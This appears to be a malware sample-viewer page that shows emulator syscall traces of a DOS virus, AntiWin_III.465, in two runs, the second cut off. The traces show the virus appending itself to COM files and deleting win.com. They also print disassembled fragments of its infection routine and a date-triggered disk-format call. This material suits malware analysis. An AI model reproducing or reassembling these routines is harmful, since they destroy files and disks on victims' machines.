Sample viewer

vx.netlux.org/Virus.DOS.AntiWin_III.465

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:49.287240677Z 26 PC: 147b3 | Set disk transfer address
2018-12-17T22:46:49.288897887Z 250 PC: 147bb | UNKNOWN!
2018-12-17T22:46:49.289672819Z 71 PC: 147c6 | Get current directory
2018-12-17T22:46:49.291619349Z 25 PC: 147ca | Get default drive
2018-12-17T22:46:49.293628259Z 78 PC: 147e2 | Find first file
2018-12-17T22:46:49.297405745Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.301412012Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.303001155Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.304837036Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.307309983Z 61 PC: 147f0 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:49.313793832Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.315316812Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.316952376Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.327215506Z 61 PC: 147f0 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:49.34976626Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.351063503Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.352679205Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.355211901Z 61 PC: 147f0 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:49.366302613Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.368312774Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.370537927Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.372849452Z 61 PC: 147f0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:49.379086275Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.380873333Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.382462741Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.384716531Z 61 PC: 147f0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:49.391827979Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.393120989Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.394729669Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.397967945Z 61 PC: 147f0 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:49.404374575Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.406054094Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.410062723Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.412701098Z 61 PC: 147f0 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:49.419387904Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.421402207Z 66 PC: 14824 | Move file pointer
2018-12-17T22:46:49.422968899Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:49.429451913Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.439516832Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.441978829Z 59 PC: 148f7 | Change current directory
2018-12-17T22:46:49.446766292Z 62 PC: 148b0 | Close file
2018-12-17T22:46:49.44877481Z 26 PC: 148b7 | Set disk transfer address
2018-12-17T22:46:49.450050498Z 59 PC: 148bf | Change current directory
2018-12-17T22:46:49.454009266Z 26 PC: 145e2 | Set disk transfer address
2018-12-17T22:46:49.455894659Z 71 PC: 14682 | Get current directory
2018-12-17T22:46:49.45858757Z 78 PC: 145f1 | Find first file
2018-12-17T22:46:49.465080382Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.472719378Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:46:49.479365765Z 66 PC: 14630 | Move file pointer
2018-12-17T22:46:49.48098069Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:46:49.484492379Z 66 PC: 14648 | Move file pointer
2018-12-17T22:46:49.486009944Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:46:49.499105675Z 62 PC: 14659 | Close file
2018-12-17T22:46:49.50753481Z 59 PC: 14661 | Change current directory
2018-12-17T22:46:49.511604887Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-17T22:46:49.859525379Z 59 PC: 1466e | Change current directory
2018-12-17T22:46:49.861908453Z 26 PC: 14677 | Set disk transfer address
2018-12-17T22:46:49.862933715Z 71 PC: 1441e | Get current directory
2018-12-17T22:46:49.864991934Z 26 PC: 1443d | Set disk transfer address
2018-12-17T22:46:49.866566747Z 78 PC: 14447 | Find first file
2018-12-17T22:46:49.870297424Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.874313987Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:49.880519644Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.887149755Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:49.888833266Z 66 PC: 1448b | Move file pointer
2018-12-17T22:46:49.8903706Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-17T22:46:49.892712595Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:49.895355945Z 66 PC: 144c6 | Move file pointer
2018-12-17T22:46:49.897241872Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-17T22:46:49.905199072Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-17T22:46:49.906696857Z 59 PC: 144ee | Change current directory
2018-12-17T22:46:49.910317666Z 87 PC: 14500 | Get or set file date and time
2018-12-17T22:46:49.911860374Z 62 PC: 14504 | Close file
2018-12-17T22:46:49.919513745Z 67 PC: 14513 | Get or set file attributes
2018-12-17T22:46:49.941219769Z 59 PC: 1451b | Change current directory
2018-12-17T22:46:49.944836076Z 26 PC: 14527 | Set disk transfer address
2018-12-17T22:46:49.946183836Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:46:49.950951254Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:46:49.952202349Z 26 PC: 14274 | Set disk transfer address
2018-12-17T22:46:49.953289269Z 71 PC: 14281 | Get current directory
2018-12-17T22:46:49.957963442Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-17T22:46:49.960371358Z 78 PC: 142b7 | Find first file
2018-12-17T22:46:49.966392581Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.973294386Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:49.9769879Z 87 PC: 142ec | Get or set file date and time
2018-12-17T22:46:49.97867614Z 66 PC: 142fc | Move file pointer
2018-12-17T22:46:49.980292839Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-17T22:46:49.988095717Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-17T22:46:49.990506999Z 66 PC: 14320 | Move file pointer
2018-12-17T22:46:49.992364673Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-17T22:46:50.002950667Z 66 PC: 14336 | Move file pointer
2018-12-17T22:46:50.004178427Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-17T22:46:50.006799636Z 87 PC: 14348 | Get or set file date and time
2018-12-17T22:46:50.00895229Z 62 PC: 1434c | Close file
2018-12-17T22:46:50.017821758Z 59 PC: 14354 | Change current directory
2018-12-17T22:46:50.019623159Z 26 PC: 1435b | Set disk transfer address
2018-12-17T22:46:50.022948748Z 48 PC: 1404a | Get DOS version
2018-12-17T22:46:50.02452451Z 47 PC: 14056 | Get disk transfer address
2018-12-17T22:46:50.026074358Z 26 PC: 14063 | Set disk transfer address
2018-12-17T22:46:50.027790481Z 78 PC: 140d6 | Find first file
2018-12-17T22:46:50.033633796Z 67 PC: 1411a | Get or set file attributes
2018-12-17T22:46:50.039050713Z 67 PC: 14128 | Get or set file attributes
2018-12-17T22:46:50.050191422Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:50.056717061Z 87 PC: 1413c | Get or set file date and time
2018-12-17T22:46:50.058087336Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-17T22:46:50.060898751Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:50.0633911Z 66 PC: 14160 | Move file pointer
2018-12-17T22:46:50.064797012Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.073750807Z 66 PC: 1418d | Move file pointer
2018-12-17T22:46:50.075368705Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-17T22:46:50.078377135Z 87 PC: 141aa | Get or set file date and time
2018-12-17T22:46:50.080676055Z 62 PC: 141ae | Close file
2018-12-17T22:46:50.090683726Z 67 PC: 141b9 | Get or set file attributes
2018-12-17T22:46:50.414288343Z 26 PC: 141c4 | Set disk transfer address
2018-12-17T22:46:50.416099482Z 26 PC: 13e67 | Set disk transfer address
2018-12-17T22:46:50.417316849Z 78 PC: 13ea5 | Find first file
2018-12-17T22:46:50.423136098Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:50.430272238Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.432816758Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.434093832Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.43811946Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.446117669Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.447384825Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.450341616Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.458666715Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.461819999Z 61 PC: 13eb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:50.469585841Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.476396178Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.477970066Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.480890519Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.484029387Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.485352216Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.488321377Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.495695855Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.498165376Z 61 PC: 13eb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:50.504917875Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.511005381Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.512251659Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.515384198Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.523221287Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.524540845Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.531731917Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.539615174Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.542146875Z 61 PC: 13eb1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:50.548851969Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.555233459Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.556586429Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.559500902Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.56826659Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.569691992Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.57650095Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.584432071Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.586793805Z 61 PC: 13eb1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:50.594651261Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.603391164Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.605090461Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.609092779Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.617674929Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.619328517Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.626512863Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.635351175Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.637791768Z 61 PC: 13eb1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:50.644835659Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.651154469Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.652430326Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.655990587Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.66446624Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.665788278Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.672754148Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.680912567Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.683389477Z 61 PC: 13eb1 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:50.690354516Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.696703374Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.698052638Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.701350242Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.70904676Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.710310209Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.717325891Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.725159659Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.728279712Z 61 PC: 13eb1 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:50.734747876Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.737176197Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.738421022Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.746056368Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.756672625Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.758022529Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.760967475Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.768691982Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.771002745Z 26 PC: 13e7b | Set disk transfer address
2018-12-17T22:46:50.772131813Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:46:50.77722225Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:18.446868629Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.448743289Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.450846472Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.455081475Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.457735868Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.464286394Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.47138355Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.472967063Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.476528628Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.479623663Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.487647687Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.49008645Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.492462025Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.495688051Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.509870884Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.512296931Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.514136222Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.517703045Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.525181537Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.527090604Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.53053151Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.539985205Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.54782666Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.550102728Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.552781204Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.556233328Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.564804569Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.56688387Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.568870891Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.572377289Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.580096022Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.582396486Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.584462835Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.589080326Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.596640781Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.59854521Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:18.601600524Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.608910411Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.610773551Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.614110172Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.618818077Z 62 PC: 148b0 | Close file
2018-12-25T12:22:18.620534477Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.622469064Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.626515892Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.627727073Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.630590929Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.634495188Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.642320036Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.647404729Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.649304563Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.652162423Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.654190588Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:18.668777462Z 62 PC: 14659 | Close file
2018-12-25T12:22:18.677437984Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:18.681932286Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.023004062Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.02552902Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.027321352Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.031573059Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.033339724Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.040116981Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.053187665Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.061167854Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.069211824Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.072035723Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.074133248Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.076584769Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.079610879Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.082976154Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.387805516Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:19.391008212Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:19.404881292Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.407745196Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.417631292Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.430589794Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.434691483Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.436120796Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.440297446Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.443825796Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.445541621Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.450637799Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:19.454938908Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:19.463065043Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.470571446Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.475060952Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:19.476631083Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:19.478232336Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:19.487617721Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-25T12:22:19.490184511Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:19.492084197Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:19.65694466Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:19.659238578Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:19.662716541Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:19.665149018Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.765923329Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.768427925Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.770424558Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:19.77337649Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.77500445Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.77672707Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.788269622Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.795527823Z 67 PC: 14128 | Get or set file attributes
